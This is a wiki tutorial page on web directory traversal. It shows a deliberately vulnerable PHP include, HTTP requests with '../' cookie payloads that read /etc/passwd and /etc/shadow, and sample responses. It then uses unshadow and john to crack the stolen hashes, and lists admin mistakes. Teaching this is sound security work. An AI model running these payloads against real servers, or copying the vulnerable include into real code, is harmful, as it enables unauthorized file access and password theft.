VULNERABILITY: Web Directory Traversal Vulnerability (en)

From OnnoWiki
Revision as of 12:29, 6 January 2025 by Onnowpurbo (talk | contribs) (Created page with "==Directory Traversal== Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-provided file names, such as charact...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Directory Traversal

Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-provided file names, such as characters representing "traverse to parent directory" passed to the file API.

The aim of this attack is to use misconfigured applications to gain unauthorized access to the file system. This attack exploits a lack of security (even though the software acts exactly as it should), unlike exploiting bugs in the code.

Directory traversal is also known as ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also considered canonicalization attacks.

A simple example of a vulnerable PHP application is below: 

<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
   $template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>

The application could be named, for example, vulnerable.php. Located under the web folder /var/www/html/vulnerable.php

An attack against this system can be performed using the following HTTP request, if you encounter difficulties you can use: 

telnet ip-address-server 80

Enter/type each sentence below one at a time: 

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Cookie: TEMPLATE=../../../../../../../../../etc/shadow

Response from ../../etc/passwd might look like: 

HTTP/1.1 200 OK
Date: Fri, 01 Jun 2018 23:21:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2164
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
...
...
etc

The repeated ../ characters after /home/users/phpguru/templates/ cause the include() to traverse to the root directory, then include the Unix password file /etc/passwd.

The /etc/passwd file is commonly used as an example in directory traversal attacks and is indeed commonly targeted by crackers attempting to breach systems.

On modern Linux/Unix systems, the /etc/passwd file does not contain passwords. Passwords are in the shadow file, which usually can only be accessed by root. If the server admin is somewhat negligent and changes permissions, for instance: 

sudo su
chmod 644 /etc/shadow

Then the command ../../etc/shadow would yield, for example: 

HTTP/1.1 200 OK
Date: Fri, 01 Jun 2018 23:26:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1767
Connection: close
Content-Type: text/html; charset=UTF-8

root:!:17273:0:99999:7:::
daemon:*:16911:0:99999:7:::
bin:*:16911:0:99999:7:::
sys:*:16911:0:99999:7:::
sync:*:16911:0:99999:7:::
games:*:16911:0:99999:7:::
man:*:16911:0:99999:7:::
lp:*:16911:0:99999:7:::
mail:*:16911:0:99999:7:::
news:*:16911:0:99999:7:::
uucp:*:16911:0:99999:7:::
...
...
etc

Combine the two outputs, for example, output /etc/passwd in file passwd.txt output /etc/shadow in file shadow.txt with both files, you can crack using john: 

unshadow passwd.txt shadow.txt > mypasswd
john mypasswd

The result would be passwords cracked, approximately: 

Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (redi)
123456           (krida)
123456           (onno)
123456           (pangtni)
123456           (kasum)
123456           (dansatsiber)
6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green
Use the "--show" option to display all of the cracked passwords reliably

Admin Mistakes

  • Including vulnerable PHP
  • A fatal admin mistake here is typing:
sudo su
chmod 644 /etc/shadow
Retrieved from "https://onnocenter.or.id/wiki/index.php?title=VULNERABILITY:_Web_Directory_Traversal_Vulnerability_(en)&oldid=71774"